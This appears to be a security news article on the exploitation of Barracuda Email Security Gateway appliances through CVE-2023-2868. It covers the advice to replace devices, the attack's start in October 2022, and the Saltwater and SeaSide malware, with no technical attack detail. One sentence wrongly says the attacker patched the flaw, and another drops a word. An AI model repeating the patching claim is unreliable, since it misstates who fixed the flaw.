HQ/EMEAFind out how we can help your business
A cybersecurity firm published a warning that users should replace their ESG appliances since an ongoing attack targets the now-fixed zero-day flaw in their devices.
The company also recommended that all its users replace all the impacted and not attempt to fix their devices. Moreover, the company has informed the affected customers about the breached Email Security Gateway user interface.
On the other hand, customers who have yet to replace their devices should immediately contact their support group via email.
This notice appeared after the critical Barracuda ESG remote command injection vulnerability was patched by the attacker remotely last month, and the attackers’ access to the compromised appliances was cut off a day later by the security team by launching a dedicated script.
ESG appliances started experiencing breaches last month.
Barracuda notified their customers that their ESG appliances could have suffered a breach last month via the CVE-2023-2868 flaw. The company recommends that its users observe the environment for signs of unwanted activities. Additionally, separate research claimed that the exploit had started as early as October last year.
According to the company, the attackers exploited the Barracuda ESG flaw as a zero-day vulnerability for at least seven months to infiltrate customers’ ESG appliances with specially crafted malware strain. The malware allowed attackers to steal data disclosed by the company a week ago.
The threat actors first used the flaw in October 2022 to breach a subset of ESG appliances and deploy malware, enabling the attackers with continued access to the compromised devices. Some researchers believe that the actors launched the Saltwater malware to backdoor the infected appliances and a malicious tool called SeaSide to drop reverse shells for easy remote access through SMTP commands.
Next, the threat actors exploited the information from the backdoored ESG appliances. CISA also added CVE-2023-2868 vulnerability to their catalogue of flaws actors use in attacks.
Barracuda explained that there are about 200,000 organisations that use their products, including well-known firms such as Delta Airlines, Kraft, Mitsubishi, and Samsung.
